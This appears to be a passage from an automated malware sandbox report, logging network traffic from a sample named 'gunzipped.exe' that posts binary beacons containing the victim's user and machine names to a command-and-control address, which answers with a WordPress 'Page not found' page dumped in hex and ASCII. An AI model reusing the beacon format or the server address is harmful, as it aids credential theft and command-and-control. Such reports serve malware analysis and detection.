                          Apr 17, 2024 03:17:39.132993937 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:39.133033991 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:39.133074045 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:39.133114100 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:39.133152962 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          31192.168.2.549743136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:39.820704937 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:40.024130106 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:40.943911076 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:39 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:40.943933964 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:40.943955898 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:40.943974972 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:40.943998098 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:40.944015026 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:40.944034100 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:40.944051027 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:40.944067955 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:17:40.944088936 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          32192.168.2.549744136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:17:41.291392088 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:17:41.499365091 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:17:42.471524000 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:17:41 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:17:42.471549034 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:17:42.471566916 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:17:42.471585035 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:17:42.471604109 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:17:42.471621990 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:17:42.471642017 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:17:42.471657991 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:17:42.471676111 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
